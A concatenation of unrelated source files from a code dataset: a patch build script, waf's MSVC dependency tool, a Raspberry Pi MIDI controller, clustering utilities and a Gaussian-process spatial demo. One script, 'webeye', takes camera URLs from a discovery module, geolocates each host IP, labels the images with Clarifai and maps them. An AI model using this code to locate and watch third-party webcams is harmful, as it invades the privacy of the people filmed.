patch[patch_info] = array[patch_info]
patches.append(patch)
# Set the offset right for the patches
for patch in patches:
match = search("(.create.*[\"|']%s[\"|'].*)" % patch["name"], verfile)
if not match:
print("Couldn't find where %s is created." % patch["name"], file=stderr)
exit(1)
toreplace = match.group(0)
replaceby = ".create \"%(name)s\", %(offset)s\n.org %(offset)s" % patch
verfile = verfile.replace(toreplace, replaceby)
# Set the version-specific variables
if "variables" in version:
vartext = ""
for variable in version["variables"]:
vartext += ".definelabel %s, %s\n" % (variable, version["variables"][variable])
verfile = verfile.replace("#!variables\n", vartext)
# Build dir for this version
try:
mkdir(verdir_build)
except OSError as ex:
if ex.errno == EEXIST:
pass
else:
raise
chdir(verdir_build)
# Compile it
open("patches.s", "w").write(verfile)
if system("armips patches.s"):
print("Couldn't compile version %s for some reason." % version["version"], file=stderr)
exit(1)
# Bake the cake
# What kind of cake is it?
cake_type = console_dict[version["console"]] << 4 | (type_dict[info["type"]] & 0xF)
# Create the header
cake_header = pack("BBBB", patch_count, int(version["version"], 0), cake_type, len(info["description"]) + 5)
cake_header += (info["description"] + '\0').encode()
# Create the patch headers
patch_header_len = 13
cur_offset = len(cake_header) + patch_header_len * patch_count
for patch in patches:
options = 0
if "options" in patch:
for option in patch["options"]:
if option in options_dict:
options |= options_dict[option]
else:
print("I don't know what option %s means." % option, file=stderr)
exit(1)
patch_len = getsize(patch["name"])
cake_header += pack("IIIB", int(patch["offset"], 0), cur_offset, patch_len, options)
cur_offset += patch_len
# Append the patches
cake = cake_header
for patch in patches:
cake += open(patch["name"], "rb").read()
chdir(dir_top)
try:
makedirs(verdir_out)
except OSError as ex:
if ex.errno == EEXIST:
pass
else:
raise
open(verdir_out + "/" + info["name"] + ".cake", "wb").write(cake)
| gpl-3.0 | -1,199,622,376,286,306,800 | 29.23622 | 112 | 0.580729 | false |
hlange/LogSoCR | .waf/waflib/extras/msvcdeps.py | 1 | 10082 | #!/usr/bin/env python
# encoding: utf-8
# Copyright Garmin International or its subsidiaries, 2012-2013
'''
Off-load dependency scanning from Python code to MSVC compiler
This tool is safe to load in any environment; it will only activate the
MSVC exploits when it finds that a particular taskgen uses MSVC to
compile.
Empirical testing shows about a 10% execution time savings from using
this tool as compared to c_preproc.
The technique of gutting scan() and pushing the dependency calculation
down to post_run() is cribbed from gccdeps.py.
'''
import os
import sys
import tempfile
import threading
from waflib import Context, Errors, Logs, Task, Utils
from waflib.Tools import c_preproc, c, cxx, msvc
from waflib.TaskGen import feature, before_method
lock = threading.Lock()
nodes = {} # Cache the path -> Node lookup
PREPROCESSOR_FLAG = '/showIncludes'
INCLUDE_PATTERN = 'Note: including file:'
# Extensible by outside tools
supported_compilers = ['msvc']
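# With an English-locale cl.exe, every header the compiler pulls in is echoed on
# stdout as a line such as
#   Note: including file:   C:\include\foo.h
# (nested includes are indented further). post_run() below recovers the path simply by
#   line[len(INCLUDE_PATTERN):].strip()
# so the pattern above only matches compilers that emit their messages in English.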
@feature('c', 'cxx')
@before_method('process_source')
def apply_msvcdeps_flags(taskgen):
if taskgen.env.CC_NAME not in supported_compilers:
return
for flag in ('CFLAGS', 'CXXFLAGS'):
if taskgen.env.get_flat(flag).find(PREPROCESSOR_FLAG) < 0:
taskgen.env.append_value(flag, PREPROCESSOR_FLAG)
# Figure out what casing conventions the user's shell used when
# launching Waf
(drive, _) = os.path.splitdrive(taskgen.bld.srcnode.abspath())
taskgen.msvcdeps_drive_lowercase = drive == drive.lower()
def path_to_node(base_node, path, cached_nodes):
# Take the base node and the path and return a node
# Results are cached because searching the node tree is expensive
# The following code is executed by threads, it is not safe, so a lock is needed...
if getattr(path, '__hash__'):
node_lookup_key = (base_node, path)
else:
# Not hashable, assume it is a list and join into a string
node_lookup_key = (base_node, os.path.sep.join(path))
try:
lock.acquire()
node = cached_nodes[node_lookup_key]
except KeyError:
node = base_node.find_resource(path)
cached_nodes[node_lookup_key] = node
finally:
lock.release()
return node
'''
Register a task subclass that has hooks for running our custom
dependency calculations rather than the C/C++ stock c_preproc
method.
'''
def wrap_compiled_task(classname):
derived_class = type(classname, (Task.classes[classname],), {})
def post_run(self):
if self.env.CC_NAME not in supported_compilers:
return super(derived_class, self).post_run()
if getattr(self, 'cached', None):
return Task.Task.post_run(self)
bld = self.generator.bld
unresolved_names = []
resolved_nodes = []
lowercase = self.generator.msvcdeps_drive_lowercase
correct_case_path = bld.path.abspath()
correct_case_path_len = len(correct_case_path)
correct_case_path_norm = os.path.normcase(correct_case_path)
# Dynamically bind to the cache
try:
cached_nodes = bld.cached_nodes
except AttributeError:
cached_nodes = bld.cached_nodes = {}
for path in self.msvcdeps_paths:
node = None
if os.path.isabs(path):
# Force drive letter to match conventions of main source tree
drive, tail = os.path.splitdrive(path)
if os.path.normcase(path[:correct_case_path_len]) == correct_case_path_norm:
# Path is in the sandbox, force it to be correct. MSVC sometimes returns a lowercase path.
path = correct_case_path + path[correct_case_path_len:]
else:
# Check the drive letter
if lowercase and (drive != drive.lower()):
path = drive.lower() + tail
elif (not lowercase) and (drive != drive.upper()):
path = drive.upper() + tail
node = path_to_node(bld.root, path, cached_nodes)
else:
base_node = bld.bldnode
# when calling find_resource, make sure the path does not begin by '..'
path = [k for k in Utils.split_path(path) if k and k != '.']
while path[0] == '..':
path = path[1:]
base_node = base_node.parent
node = path_to_node(base_node, path, cached_nodes)
if not node:
raise ValueError('could not find %r for %r' % (path, self))
else:
if not c_preproc.go_absolute:
if not (node.is_child_of(bld.srcnode) or node.is_child_of(bld.bldnode)):
# System library
Logs.debug('msvcdeps: Ignoring system include %r', node)
continue
if id(node) == id(self.inputs[0]):
# Self-dependency
continue
resolved_nodes.append(node)
bld.node_deps[self.uid()] = resolved_nodes
bld.raw_deps[self.uid()] = unresolved_names
try:
del self.cache_sig
except AttributeError:
pass
Task.Task.post_run(self)
def scan(self):
if self.env.CC_NAME not in supported_compilers:
return super(derived_class, self).scan()
resolved_nodes = self.generator.bld.node_deps.get(self.uid(), [])
unresolved_names = []
return (resolved_nodes, unresolved_names)
def sig_implicit_deps(self):
if self.env.CC_NAME not in supported_compilers:
return super(derived_class, self).sig_implicit_deps()
try:
return Task.Task.sig_implicit_deps(self)
except Errors.WafError:
return Utils.SIG_NIL
def exec_response_command(self, cmd, **kw):
# exec_response_command() is only called from inside msvc.py anyway
assert self.env.CC_NAME in supported_compilers
# Only bother adding '/showIncludes' to compile tasks
if isinstance(self, (c.c, cxx.cxx)):
try:
# The Visual Studio IDE adds an environment variable that causes
# the MS compiler to send its textual output directly to the
# debugging window rather than normal stdout/stderr.
#
# This is unrecoverably bad for this tool because it will cause
# all the dependency scanning to see an empty stdout stream and
# assume that the file being compiled uses no headers.
#
# See http://blogs.msdn.com/b/freik/archive/2006/04/05/569025.aspx
#
# Attempting to repair the situation by deleting the offending
# envvar at this point in tool execution will not be good enough--
# its presence poisons the 'waf configure' step earlier. We just
# want to put a sanity check here in order to help developers
# quickly diagnose the issue if an otherwise-good Waf tree
# is then executed inside the MSVS IDE.
assert 'VS_UNICODE_OUTPUT' not in kw['env']
tmp = None
# This block duplicated from Waflib's msvc.py
if sys.platform.startswith('win') and isinstance(cmd, list) and len(' '.join(cmd)) >= 8192:
program = cmd[0]
cmd = [self.quote_response_command(x) for x in cmd]
(fd, tmp) = tempfile.mkstemp()
os.write(fd, '\r\n'.join(i.replace('\\', '\\\\') for i in cmd[1:]).encode())
os.close(fd)
cmd = [program, '@' + tmp]
# ... end duplication
self.msvcdeps_paths = []
kw['env'] = kw.get('env', os.environ.copy())
kw['cwd'] = kw.get('cwd', os.getcwd())
kw['quiet'] = Context.STDOUT
kw['output'] = Context.STDOUT
out = []
try:
raw_out = self.generator.bld.cmd_and_log(cmd, **kw)
ret = 0
except Errors.WafError as e:
raw_out = e.stdout
ret = e.returncode
for line in raw_out.splitlines():
if line.startswith(INCLUDE_PATTERN):
inc_path = line[len(INCLUDE_PATTERN):].strip()
Logs.debug('msvcdeps: Regex matched %s', inc_path)
self.msvcdeps_paths.append(inc_path)
else:
out.append(line)
# Pipe through the remaining stdout content (not related to /showIncludes)
if self.generator.bld.logger:
self.generator.bld.logger.debug('out: %s' % os.linesep.join(out))
else:
sys.stdout.write(os.linesep.join(out) + os.linesep)
finally:
if tmp:
try:
os.remove(tmp)
except OSError:
pass
return ret
else:
# Use base class's version of this method for linker tasks
return super(derived_class, self).exec_response_command(cmd, **kw)
def can_retrieve_cache(self):
# msvcdeps and netcaching are incompatible, so disable the cache
if self.env.CC_NAME not in supported_compilers:
return super(derived_class, self).can_retrieve_cache()
self.nocache = True # Disable sending the file to the cache
return False
derived_class.post_run = post_run
derived_class.scan = scan
derived_class.sig_implicit_deps = sig_implicit_deps
derived_class.exec_response_command = exec_response_command
derived_class.can_retrieve_cache = can_retrieve_cache
for k in ('c', 'cxx'):
wrap_compiled_task(k)
| agpl-3.0 | 2,727,420,422,639,477,000 | 37.480916 | 111 | 0.573696 | false |
Ppamo/raspi-noisebox-control | noise-control.py | 1 | 2463 | BLINKING_RATE_READY = 1.5
BLINKING_RATE_WAITING = 0.1
BLINKING_RATE_LOADING = 0.3
PIN_BUTTON=3
PIN_BLUE=23
PIN_RED=24
import os,sys,time,signal,subprocess,json
import rtmidi_python as rtmidi
import RPi.GPIO as GPIO
midi_in = [rtmidi.MidiIn()]
attached = set()
attached.add(midi_in[0].ports[0])
p = None
with open('noise-control.json') as map_file:
map = json.load(map_file)
def button_callback(channel):
kill_cmd(None)
GPIO.cleanup()
log('shutdown now!')
os.system("shutdown now -h")
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.setup(PIN_RED, GPIO.OUT)
GPIO.setup(PIN_BLUE, GPIO.OUT)
GPIO.setup(PIN_BUTTON, GPIO.IN, GPIO.PUD_UP)
GPIO.add_event_detect(PIN_BUTTON, GPIO.FALLING, callback=button_callback,bouncetime=500)
def set_led_status(status):
GPIO.output(PIN_RED, status)
GPIO.output(PIN_BLUE, not status)
return not status
def log(message):
print message
def signal_handler(signum, frame):
global blinking_rate
if signum == signal.SIGUSR1:
log ('Child ready')
blinking_rate = BLINKING_RATE_READY
elif signum == signal.SIGUSR2:
log ('Child busy')
blinking_rate = BLINKING_RATE_WAITING
elif signum == signal.SIGINT or signum == signal.SIGQUIT:
log ('good bye!')
GPIO.cleanup()
sys.exit(0)
def exec_cmd(device):
global p
device_name = device.split(' ')[0]
if device_name in map:
p = subprocess.Popen(args = map[device_name])
def kill_cmd(device):
global p
    if p is not None and p.poll() is None:
        log('killing %d' % p.pid)
        p.send_signal(signal.SIGINT)
        time.sleep(0.5)
def attach_device(port):
log('attaching ' + port)
global blinking_rate
blinking_rate = BLINKING_RATE_LOADING
attached.add(port)
exec_cmd(port)
def dettach_device(port):
log('dettaching ' + port)
global blinking_rate
blinking_rate = BLINKING_RATE_LOADING
log('loading')
kill_cmd(port)
attached.remove(port)
log('loading')
blinking_rate = BLINKING_RATE_LOADING
blinking = False
signal.signal(signal.SIGUSR1, signal_handler)
signal.signal(signal.SIGUSR2, signal_handler)
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGQUIT, signal_handler)
while True:
# if something has changed in midi ports
if len(set(midi_in[0].ports) ^ attached) > 0:
ports = set(midi_in[0].ports)
# attach if there is new elements
for i in ports - attached:
attach_device(i)
# dettach if necessary
for i in attached - ports:
dettach_device(i)
blinking = set_led_status(blinking)
time.sleep(blinking_rate)
| mit | -6,005,659,446,975,328,000 | 22.457143 | 88 | 0.723508 | false |
rvictorino/webeye | img_recogn.py | 1 | 3053 | from clarifai import rest
from clarifai.rest import ClarifaiApp
import argparse
from urlparse import urlparse
import urllib2
import urllib
import json
import cam_discovery
MAPS_API_KEY = ""
OUTPUT_FILE_PATH = "/var/www/html/webeye/webeye.js"
def get_url_list_from_file(file_path):
file_to_read=open(file_path,'r')
return file_to_read.readlines()
def get_location(uri):
domain = urlparse(uri).netloc.split(":")[0]
result = urllib2.urlopen("http://ip-api.com/json/" + str(domain)).read()
parsed = json.loads(result)
return {"lat": parsed["lat"], "lon": parsed["lon"]}
def generate_map(located_images_list):
url_base = "https://maps.googleapis.com/maps/api/staticmap?"
params = {"key": MAPS_API_KEY, "size": "500x400"}
# generate markers
markers = []
for located_img in located_images_list:
loc = located_img["location"]
markers.append("markers=color:blue%7Clabel:M%7C{0},{1}".format(loc["lat"], loc["lon"]))
final_url = url_base + urllib.urlencode(params) + "&" + "&".join(markers)
return final_url
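# The generated URL is roughly of the following shape (illustrative values, parameter
# order may vary since it comes from a dict):
#   https://maps.googleapis.com/maps/api/staticmap?key=...&size=500x400&markers=color:blue%7Clabel:M%7C48.85,2.35&markers=...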
def generate_JSON_file(located_images_list):
dest_file = open(OUTPUT_FILE_PATH, 'w')
json_data = json.dumps(located_images_list)
print >> dest_file, "var webeye = " + json_data
dest_file.close()
def remove_port_from_url(url):
parsed_url = urlparse(url)
if parsed_url.port == 80:
return parsed_url.scheme + "://" + parsed_url.netloc[:-3] + parsed_url.path
return parsed_url.geturl()
parser = argparse.ArgumentParser()
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("-u", help="url to the image to predict")
group.add_argument("-f", help="path to file containing list of image urls")
group.add_argument("-n", type=int, default=6, help="number of url to import")
parser.add_argument("--static", action='store_true', help="output a google static map url")
args = parser.parse_args()
# parse arguments: one url or a list within a file ?
if args.u is not None:
url_list = [args.u]
elif args.f is not None:
url_list = get_url_list_from_file(args.f)
else:
url_list = cam_discovery.get_best_cam_urls(args.n)
# init ClarifAi app
print("Connecting to ClarifAi")
app = ClarifaiApp("", "")
model = app.models.get("general-v1.3")
geo_data = []
# parse each url
for img_url in url_list:
geo_concept = {}
img_url = remove_port_from_url(img_url)
print(img_url)
# get image url
geo_concept["url"] = img_url
# get lat / lon from IP or domain
geo_concept["location"] = get_location(img_url)
# get concepts in image
geo_concept["concepts"] = []
result = model.predict_by_url(url=img_url)
for concept in result["outputs"][0]["data"]["concepts"]:
print("{0:s}: {1:.2f}%".format(concept["name"], concept["value"]*100))
geo_concept["concepts"].append({"concept": str(concept["name"]), "probability": concept["value"]*100})
# feed the list
geo_data.append(geo_concept)
#TODO: use these data to generate a dynamic google map, including concepts data as tooltips
if args.static:
map_url = generate_map(geo_data)
print(map_url)
else:
# dynamic map
generate_JSON_file(geo_data)
| gpl-3.0 | -3,981,476,711,404,548,000 | 27.53271 | 104 | 0.697674 | false |
twankim/weaksemi | utils.py | 1 | 7546 | # -*- coding: utf-8 -*-
# @Author: twankim
# @Date: 2017-05-05 20:22:13
# @Last Modified by: twankim
# @Last Modified time: 2017-10-26 03:25:34
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import pandas as pd
def accuracy(y_true,y_pred):
return 100*np.sum(y_true==y_pred)/float(len(y_true))
def mean_accuracy(y_true,y_pred):
labels = np.unique(y_true)
accuracy = np.zeros(len(labels))
hamming = y_true==y_pred
accuracy = [100*np.sum(hamming[y_true==label])/float(np.sum(y_true==label)) \
for label in labels]
return np.mean(accuracy)
def error(y_true,y_pred):
return 100*np.sum(y_true!=y_pred)/float(len(y_true))
def mean_error(y_true,y_pred):
labels = np.unique(y_true)
num_error = np.zeros(len(labels))
hamming = y_true!=y_pred
error = [100*np.sum(hamming[y_true==label])/float(np.sum(y_true==label)) \
for label in labels]
return np.mean(error)
# Find best matching permutation of y_pred clustering
# Also need to change mpp of algorithm
def find_permutation(dataset,algo):
# Calculate centers of original clustering
label_org = list(np.unique(dataset.y))
means_org = [np.mean(dataset.X[dataset.y==label,:],axis=0) for label in label_org]
labels_map = {} # Map from algorithm's label to true label
# Initialize label mapping
for label in xrange(algo.k+1):
labels_map[label] = 0
if len(algo.labels)==0:
return algo.y
for label,mpp in zip(algo.labels,algo.mpps):
# Calculate distance between estimated center and true centers
dist = [np.linalg.norm(mpp-mean_org) for mean_org in means_org]
# Assign true cluster label to the algorithm's label
idx_best = np.argmin(dist)
labels_map[label] = label_org[idx_best]
# Remove assigned label from the list
del means_org[idx_best]
del label_org[idx_best]
return [labels_map[y] for y in algo.y]
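# Illustration with hypothetical numbers: if the algorithm's cluster 1 has its center
# (mpp) closest to the true cluster labelled 2 and vice versa, labels_map becomes
# {1: 2, 2: 1} and the returned prediction is expressed in the true labelling before
# accuracy/error are computed.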
# Plot eta v.s. evaluation
# res: rep x len(qs) x len(etas)
def print_eval(eval_metric,res,etas,fname,
is_sum=False,weak='random',params=None):
assert weak in ['random','local','global'], \
"weak must be in ['random','local','global']"
if weak == 'random':
i_name = 'q'
t_name = weak
else:
i_name = 'c_dist'
t_name = weak +' distance'
rep = res.shape[0]
if not is_sum:
df_res = pd.DataFrame(res.mean(axis=0),
columns=etas,
index=params
)
df_res.index.name=i_name
df_res.columns.name='eta'
print "\n<{}. {}-weak (Averaged over {} experiments)>".format(
eval_metric,t_name, rep)
else:
df_res = pd.DataFrame(res.sum(axis=0),
columns=etas,
index=params
)
df_res.index.name=i_name
df_res.columns.name='eta'
print "\n<{}. {}-weak (Total Sum over {} experiments)>".format(
eval_metric,t_name,rep)
print df_res
df_res.to_csv(fname)
# Plot eta v.s. evaluation
# res: rep x len(qs) x len(etas)
def plot_eval(eval_metric,res,etas,fig_name,
is_sum=False,weak='random',params=None,res_org=None):
assert weak in ['random','local','global'], \
"weak must be in ['random','local','global']"
# cmap = plt.cm.get_cmap("jet", len(params)) -> cmap(i_p)
cmap = ['g','r','b','k','y','m','c']
if weak == 'random':
i_name = 'q'
t_name = weak
else:
i_name = 'c_{dist}'
t_name = weak + ' distance'
rep = res.shape[0]
if not is_sum:
res_plt = res.mean(axis=0)
res_org_plt = res_org.mean(axis=0)
f = plt.figure()
plt.title(r"{}. {}-weak (Averaged over {} experiments)".format(
eval_metric,t_name,rep))
for i_p,param in enumerate(params):
plt.plot(etas,res_plt[i_p,:],
'x-',c=cmap[i_p],
label=r'SSAC(ours) ${}={}$'.format(i_name,param))
if res_org is not None:
plt.plot(etas,res_org_plt[i_p,:],
'o--',c=cmap[i_p],
label=r'SSAC(original) ${}={}$'.format(i_name,param))
plt.xlabel(r"$\eta$ (Number of samples per cluster)")
plt.ylabel(eval_metric)
else:
res_plt = res.sum(axis=0)
res_org_plt = res_org.sum(axis=0)
f = plt.figure()
plt.title(r"{}. {}-weak (Total sum over {} experiments)".format(
eval_metric,t_name,rep))
for i_p,param in enumerate(params):
plt.plot(etas,res_plt[i_p,:],
'x-',c=cmap[i_p],
label=r'SSAC(ours) ${}={}$'.format(i_name,param))
if res_org is not None:
plt.plot(etas,res_org_plt[i_p,:],
'o--',c=cmap[i_p],
label=r'SSAC(oroginal) ${}={}$'.format(i_name,param))
plt.xlabel(r"$\eta$ (Number of samples per cluster)")
plt.ylabel(eval_metric)
if "accuracy" in eval_metric.lower():
plt.legend(loc=4)
min_val = min(res_plt.min(),res_org_plt.min())
max_val = max(res_plt.max(),res_org_plt.max())
ylim_min = min_val-(max_val-min_val)*0.55
ylim_max = max_val+(max_val-min_val)*0.05
elif ("error" in eval_metric.lower()) or ("fail" in eval_metric.lower()):
plt.legend(loc=1)
max_val = max(res_plt.max(),res_org_plt.max())
ylim_min = 0 - max_val*0.1
ylim_max = max_val*1.35
else:
plt.legend(loc=4)
plt.ylim([ylim_min,ylim_max])
plt.xlim([0,np.round(1.2*max(etas))])
f.savefig(fig_name,bbox_inches='tight')
def plot_hist(gammas,min_gamma,max_gamma,fig_name):
rep = len(gammas)
if rep>40:
n_bins = int(rep/20)
else:
n_bins = 10
f = plt.figure()
plt.hist(gammas,normed=False,bins=n_bins)
plt.title(r"Histogram of $\gamma$. min={}, max={} ({} generation)".format(min_gamma,max_gamma,rep))
plt.xlabel(r"$\gamma$")
plt.ylabel("Number of data generations")
f.savefig(fig_name,bbox_inches='tight')
def plot_cluster(X,y_true,y_pred,k,mpps,gamma,title,f_name,verbose,classes=None):
if classes is not None:
classes = classes
else:
classes = range(k+1)
cmap = plt.cm.get_cmap("jet", k+1)
if verbose:
print " ... Plotting"
f = plt.figure(figsize=(14,7))
plt.suptitle(title)
# Plot original clustering (k-means)
plt.subplot(121)
for i in xrange(1,k+1):
idx = y_true==i
plt.scatter(X[idx,0],X[idx,1],c=cmap(i),label=classes[i],alpha=0.7)
# plt.scatter(X[:,0],X[:,1],c=y_true,label=classes)
plt.title("True dataset ($\gamma$={:.2f})".format(gamma))
plt.legend()
# Plot SSAC result
plt.subplot(122)
for i in xrange(0,k+1):
idx = np.array(y_pred)==i
if sum(idx)>0:
plt.scatter(X[idx,0],X[idx,1],c=cmap(i),label=classes[i],alpha=0.7)
# plt.scatter(X[:,0],X[:,1],c=y_pred,label=classes)
plt.title("SSAC result ($\gamma$={:.2f})".format(gamma))
plt.legend()
# Plot estimated cluster centers
for t in xrange(k):
mpp = mpps[t]
plt.plot(mpp[0],mpp[1],'k^',ms=15,alpha=0.7)
f.savefig(f_name,bbox_inches='tight')
plt.close()
| mit | -8,352,230,938,918,783,000 | 33.456621 | 103 | 0.550225 | false |
sparseMCMC/NIPS2015 | experiments/spatial/spatial_demo.py | 1 | 9549 | import numpy as np
import GPy
from mcmcGP import BinnedPoisson, GPMCMC, SGPMCMC, HMC, AHMC
from itertools import product
from IPython import embed
from scipy.cluster.vq import kmeans
import pyhmc
def load_pines():
X = np.load('pines.np')
return X
def build_vb(initialZ, binMids, binSize, counts, seed):
np.random.seed(seed)
lik = BinnedPoisson(binSize)
kern = getKern(False)
return GPy.core.SVGP(X=binMids, Y=counts.reshape(-1,1), Z=initialZ, kernel=kern, likelihood=lik)
def optimize_vb(m, max_iters=1000):
m.Z.fix()
m.kern.fix()
m.optimize('bfgs', max_iters=max_iters, messages=True)
m.Z.unfix()
m.kern.constrain_positive()
m.optimize('bfgs', max_iters=max_iters, messages=True)
return m
def get_samples_vb(m, num_samples):
mu, var = m._raw_predict(m.X)
samples = np.random.randn(mu.shape[0], num_samples)*np.sqrt(var) + mu
return samples
def get_samples_mc(m, samples, numsamples):
ms, vs = [],[]
for s in samples:
m.optimizer_array = s
mui, vi = m.predict_raw(m.X)
vi = np.clip(vi, 0, np.inf)
ms.append(mui); vs.append(vi)
samples = np.hstack([np.random.randn(mu.shape[0], numsamples)*np.sqrt(var) + mu for mu, var in zip(ms, vs)])
return samples
def get_samples_mc_full(m, samples):
Fs = []
for s in samples:
m.optimizer_array = s
Fs.append(m.F)
return np.hstack(Fs)
def getPriors():
return {'rbf_lengthscale': GPy.priors.Gamma(1.75,1.), 'rbf_variance': GPy.priors.Gamma(1.2, 1) }
def getKern(isBayesian):
kern = GPy.kern.RBF(2, lengthscale=1.)+GPy.kern.White(2, 1e-2)
priors = getPriors()
if isBayesian:
kern.rbf.lengthscale.set_prior(priors['rbf_lengthscale'])
kern.rbf.variance.set_prior(priors['rbf_variance'])
kern.white.variance.fix(1e-6)
return kern
def build_mc_sparse(initialZ, binMids, binSize, counts, seed):
kern = getKern(True)
lik = BinnedPoisson(binSize)
return SGPMCMC(binMids, Y=counts.reshape(-1,1), Z=initialZ, kernel=kern, likelihood=lik)
def build_mc_exact( binMids, binSize, counts, seed):
kern = getKern(False)
lik = BinnedPoisson(binSize)
return GPMCMC( X = binMids, Y=counts.reshape(-1,1), kernel = kern, likelihood = lik )
def init_mc_model_from_vb(m_mcmc, m_vb):
#take the optimized vb model, and use it to init the mcmc mode
m_mcmc.kern[:] = m_vb.kern[:]
m_mcmc.Z[:] = m_vb.Z[:]
m_mcmc.Z.fix()
L = GPy.util.choleskies.flat_to_triang(m_vb.q_u_chol)[0,:,:]
u_sample = np.dot(L, np.random.randn(m_vb.num_inducing))
u_sample += m_vb.q_u_mean.flatten()
L = GPy.util.linalg.jitchol(m_mcmc.kern.K(m_mcmc.Z))
v_sample, _ = GPy.util.linalg.dtrtrs(L, u_sample)
m_mcmc.V[:] = v_sample.reshape(-1,1)
return m_mcmc
def init_exact_mc_model_from_vb( m_mcmc_exact, m_vb ):
#This should speed things up a bit.
m_mcmc_exact.kern[:] = m_vb.kern[:]
function_sample = get_samples_vb( m_vb, 1).flatten()
L = GPy.util.linalg.jitchol(m_mcmc_exact.kern.K(m_mcmc_exact.X))
v_sample , _ = GPy.util.linalg.dtrtrs(L, function_sample)
m_mcmc_exact.V[:] = v_sample.reshape(-1,1)
return m_mcmc_exact
def convertData(X, binsPerDimension):
Y = np.histogramdd( X, bins = (binsPerDimension,binsPerDimension), range = ( (0, 1.) , (0., 1.) ) )
return Y[0].reshape( Y[0].shape[0] * Y[0].shape[1] )
def getInitialInducingGrid( nInducingPoints ):
assert( np.sqrt( nInducingPoints ) == np.floor( np.sqrt( nInducingPoints ) ) ) # check nInducingPoints is a square number.
sqrtNInducingPoints = int( np.floor( np.sqrt( nInducingPoints ) ) )
return getGrid( sqrtNInducingPoints )[1]
def getGrid( nPointsPerDim ):
linearValues = np.linspace( 0., 1., nPointsPerDim+1 )
binEdges = np.array( [ np.array( elem ) for elem in product(linearValues,linearValues) ] )
offsetValues = linearValues[:-1] + 0.5*np.diff( linearValues )[0]
binMids = np.array( [ np.array( elem ) for elem in product(offsetValues,offsetValues) ] )
return binEdges*10., binMids*10.
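# Example: getGrid(2) tiles the scaled unit square [0, 10]^2 with a 2 x 2 grid and
# returns 9 bin-edge points together with the 4 bin mid-points
# (2.5, 2.5), (2.5, 7.5), (7.5, 2.5) and (7.5, 7.5).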
def run_hmc(m, N, epsilon, Lmax):
def f(x):
return (-a for a in m._objective_grads(x))
samples, rate = HMC(f, N, Lmax=Lmax, epsilon=epsilon, x0=m.optimizer_array, verbose=True)
return samples
def priorSample():
binsPerDimension = 32
num_samples = 5
bin_edges, bin_mids = getGrid( binsPerDimension )
np.random.seed(1)
#There is almost certainly a better way to do this but tempus fugit.
priors = getPriors()
kern = getKern(True)
binArea = np.square( (bin_edges[0,1] - bin_edges[1,1] ) )
from matplotlib import pyplot as plt
for sampleIndex in range(num_samples):
print "\n sample index ", sampleIndex, "\n"
kern.rbf.lengthscale = priors['rbf_lengthscale'].rvs(1)
kern.rbf.variance = priors['rbf_variance'].rvs(1)
kern.bias.variance = priors['bias_variance'].rvs(1)
L = GPy.util.linalg.jitchol(kern.K(bin_mids))
functionSample = np.dot(L, np.random.randn( bin_mids.shape[0] ) )
intensities = np.exp( functionSample )
countSample = np.random.poisson( intensities * binArea )
print "Total counts ", np.sum( countSample )
squareIntensities = intensities.reshape( (binsPerDimension, binsPerDimension ))
squareCounts = countSample.reshape( (binsPerDimension, binsPerDimension ))
plt.figure()
plt.imshow( squareCounts, interpolation='nearest')
plt.title( "Prior sample "+ str(sampleIndex) )
plt.colorbar()
plt.figure()
plt.imshow( squareIntensities, interpolation='nearest')
plt.colorbar()
plt.title( "Prior sample "+ str(sampleIndex) )
class Experiment:
def __init__(self, seed, binsPerDimension , num_inducing, num_samples, vb_iterations, isExact=False):
self.seed, self.binsPerDimension, self.num_inducing, self.num_samples, self.isExact = seed, binsPerDimension, num_inducing, num_samples, isExact
np.random.seed(seed)
X = load_pines()
#will need to change bins to be two dimensional.
self.Y = convertData(X, binsPerDimension)
binEdges, bin_mids = getGrid( binsPerDimension )
initialZ = getInitialInducingGrid( num_inducing )
#setup and optimize VB model.
binArea = np.square( (binEdges[0,1] - binEdges[1,1] ) )
if not(isExact):
self.m_vb = build_vb(initialZ, bin_mids, binArea , self.Y, seed)
self.m_vb = optimize_vb(self.m_vb,vb_iterations)
self.fsamples_vb = get_samples_vb(self.m_vb, 1000)
self.m_mc = build_mc_sparse(initialZ, bin_mids, binArea, self.Y, seed)
self.m_mc = init_mc_model_from_vb(self.m_mc, self.m_vb)
self.samples = run_hmc(self.m_mc, num_samples, 0.125, Lmax = 20)
self.fsamples_mc = get_samples_mc(self.m_mc, self.samples[50::2], 10)
else:
priors = getPriors()
self.m_mc = build_mc_exact( bin_mids, binArea, self.Y, seed )
self.m_mc.kern.rbf.lengthscale.fix(1.)
self.m_mc.kern.rbf.variance.fix(1.)
self.m_mc.kern.white.variance.fix(1e-3)
self.m_mc.optimize('bfgs',messages=True,max_iters = 10000)
self.m_mc.kern.rbf.lengthscale.constrain_positive()
self.m_mc.kern.rbf.variance.constrain_positive()
self.m_mc.kern.white.variance.constrain_positive()
self.m_mc.kern.rbf.lengthscale.set_prior(priors['rbf_lengthscale'])
self.m_mc.kern.rbf.variance.set_prior(priors['rbf_variance'])
self.m_mc.kern.white.variance.fix(1e-3)
self.samples = run_hmc(self.m_mc, num_samples, epsilon=0.1 , Lmax = 20)
#priorSample()
if __name__ == "__main__":
num_samples = 2000
num_vb_iterations = [10000]
Ms = [225]
grids = [64]
#grids = [32]
seeds = [0]
isExact=False
experiments = [Experiment(seed, binsPerDimension=ng, num_inducing=M, num_samples=num_samples, vb_iterations=vb_iterations, isExact=isExact) for seed in seeds for ng in grids for M in Ms for vb_iterations in num_vb_iterations]
#from matplotlib import pyplot as plt
for e in experiments:
#plt.figure()
intensities = np.exp(e.fsamples_mc)*e.m_mc.likelihood.binsize
std = np.std(intensities, axis=1)
intensities = np.mean(intensities,axis=1)
squareIntensities = intensities.reshape( (e.binsPerDimension , e.binsPerDimension ))
#plt.imshow( np.flipud(squareIntensities.T ), interpolation='nearest')
#plt.colorbar()
#plt.title( 'Mean posterior intensity')
np.savetxt( 'intensity_grid%i_M%i_numsamp%i_exact%i.csv'%(e.binsPerDimension, e.num_inducing, e.num_samples, e.isExact),intensities, delimiter=',')
np.savetxt( 'intensity_std%i_M%i_numsamp%i_exact%i.csv'%(e.binsPerDimension, e.num_inducing, e.num_samples, e.isExact),std, delimiter=',')
#plt.figure()
#intensities = np.mean(np.exp(e.fsamples_vb)*e.m_mc.likelihood.binsize,axis=1)
